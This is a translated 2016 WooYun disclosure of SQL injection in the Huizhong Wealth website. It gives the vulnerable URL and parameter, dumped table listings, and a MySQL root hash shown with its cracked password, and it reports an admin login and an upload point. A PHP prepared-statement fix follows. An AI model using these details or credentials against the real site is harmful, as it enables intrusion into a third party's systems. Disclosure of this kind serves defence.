
Vulnerability Summary

Defect ID: wooyun-2016-0192647

Title: SQL injection in the Huizhong Wealth (汇中财富) portal site, allows logging into the admin backend

Vendor: 汇中财富 (Huizhong Wealth)

Author: 路人甲

Submitted: 2016-04-05 15:40

Fix time: 2016-05-20 15:40

Published: 2016-05-20 15:40

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2016-04-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-20: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As in the title.

Detailed description:

http://www.huizhongcf.com/about/yunyingshujutext.html?categoryid=53&id=438
Injectable parameter: categoryid

[screenshot: huizhong.png]


The database user has DBA privileges:

[screenshot: DBA.png]


Database: ftphzcf
[17 tables]
+-----------------------+
| adminuser |
| logrecord |
| tb_ad |
| tb_advertisement |
| tb_advertisementstype |
| tb_area |
| tb_global |
| tb_goods |
| tb_hzlanmu |
| tb_lanmu |
| tb_leaveword |
| tb_menu |
| tb_newlist |
| tb_news |
| tb_rongyu |
| tb_tag |
| tb_yuyue |
+-----------------------+
Database: ftphzcf
Table: adminuser
[5 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| u_adddate | datetime |
| u_admin | int(11) |
| u_id | mediumint(9) |
| u_name | varchar(255) |
| u_pwd | varchar(255) |
+-----------+--------------+
Plaintext passwords (the hashes were recovered for several accounts):
Database: ftphzcf
Table: adminuser
[8 entries]
The mysql user table:
Database: mysql
Table: user
[6 entries]
+---------+--------------+--------------------------------------------------+
| user | host | password |
+---------+--------------+--------------------------------------------------+
| root | localhost | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B (root) |
| root | guanwang-new | <blank> |
| root | 127.0.0.1 | <blank> |
| root | ::1 | <blank> |
| <blank> | localhost | <blank> |
| <blank> | guanwang-new | <blank> |
+---------+--------------+--------------------------------------------------+

Proof of vulnerability:

http://www.huizhongcf.com/winadmin/login.php
Logging in with an administrator account and password obtained from the injection above:

[screenshot: admin.png]


[screenshot: 123.png]


The backend has a file upload point:

[screenshot: shangchuan.png]


Remediation:

Filter special characters in input, set a password complexity policy, and hire a security specialist.
Vendor response:
Severity: No impact, vendor ignored
Ignored at: 2016-04-25 09:50

Copyright notice: when reposting, please credit 路人甲@乌云
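Filtering characters is a weak fix for this class of bug; the durable fix is to validate the numeric parameters and bind them in a prepared statement, and to connect with a least-privilege account rather than the DBA user the report found. The following is an added example written for this page, not the site's own code: the table and column names (tb_news, n_id, n_categoryid, n_title, n_body), the database account web_ro and the DB_PASS environment variable are assumptions.

```php
<?php
// Added example, not the site's code. Hardened handler for a request such as
//   yunyingshujutext.html?categoryid=53&id=438
// Assumed table/column names: tb_news(n_id, n_categoryid, n_title, n_body).
//
// The pattern the report implies (for contrast only; do not use):
//   $sql = "SELECT ... FROM tb_news WHERE categoryid=" . $_GET['categoryid'];

function readIntParam(string $name, int $min = 1, int $max = PHP_INT_MAX): int
{
    // Accept only a plain decimal integer within range; anything else is a
    // 400. For numeric parameters this removes the injection surface entirely.
    $value = filter_input(INPUT_GET, $name, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    if ($value === false || $value === null) {
        http_response_code(400);
        exit('invalid parameter');
    }
    return $value;
}

function fetchArticle(PDO $db, int $categoryId, int $id): ?array
{
    // Values are bound as integers; the SQL text never contains user input.
    $stmt = $db->prepare(
        'SELECT n_id, n_title, n_body FROM tb_news
          WHERE n_categoryid = :cat AND n_id = :id LIMIT 1');
    $stmt->bindValue(':cat', $categoryId, PDO::PARAM_INT);
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed: a read-only MySQL account (web_ro) limited to the ftphzcf schema,
// so that even a future injection cannot read mysql.user or write files.
$db = new PDO('mysql:host=localhost;dbname=ftphzcf;charset=utf8mb4',
    'web_ro', getenv('DB_PASS'), [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // server-side prepared statements
    ]);

$article = fetchArticle($db, readIntParam('categoryid'), readIntParam('id'));
if ($article === null) {
    http_response_code(404);
    exit('not found');
}
echo htmlspecialchars($article['n_title'], ENT_QUOTES, 'UTF-8');
```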


Vulnerability Response

Vendor response:

Could not reach the vendor, or the vendor actively refused

Vulnerability rank: 15 (WooYun rating)